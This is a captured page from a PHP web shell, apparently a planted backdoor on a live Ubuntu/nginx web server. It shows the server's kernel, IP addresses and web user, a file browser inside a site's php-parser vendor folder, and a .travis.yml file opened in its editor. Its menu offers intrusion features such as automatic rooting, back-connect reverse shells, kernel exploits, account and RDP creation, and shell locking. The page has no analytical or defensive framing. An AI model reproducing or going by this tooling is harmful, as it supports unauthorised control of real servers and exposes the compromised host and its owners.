Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.189
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdgamatya /
vendor /
nikic /
php-parser /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
doc
[ DIR ]
drwxr-xr-x
grammar
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
test_old
[ DIR ]
drwxr-xr-x
.gitignore
62
B
-rw-r--r--
.travis.yml
683
B
-rw-r--r--
CHANGELOG.md
16.42
KB
-rw-r--r--
LICENSE
1.48
KB
-rw-r--r--
README.md
2.99
KB
-rw-r--r--
UPGRADE-1.0.md
4.77
KB
-rw-r--r--
UPGRADE-2.0.md
2.9
KB
-rw-r--r--
UPGRADE-3.0.md
7.27
KB
-rw-r--r--
composer.json
648
B
-rw-r--r--
phpunit.xml.dist
718
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
language: php dist: trusty sudo: false cache: directories: - $HOME/.composer/cache php: - 5.5 - 5.6 - 7.0 - nightly - hhvm install: - if [ $TRAVIS_PHP_VERSION = '5.6' ]; then composer require satooshi/php-coveralls '~1.0'; fi - composer install --prefer-dist matrix: allow_failures: - php: nightly fast_finish: true script: - if [ $TRAVIS_PHP_VERSION = '5.6' ]; then vendor/bin/phpunit --coverage-clover build/logs/clover.xml; else vendor/bin/phpunit; fi - if [ $TRAVIS_PHP_VERSION = '7.0' ]; then test_old/run-php-src.sh; fi after_success: if [ $TRAVIS_PHP_VERSION = '5.6' ]; then php vendor/bin/coveralls; fi
Close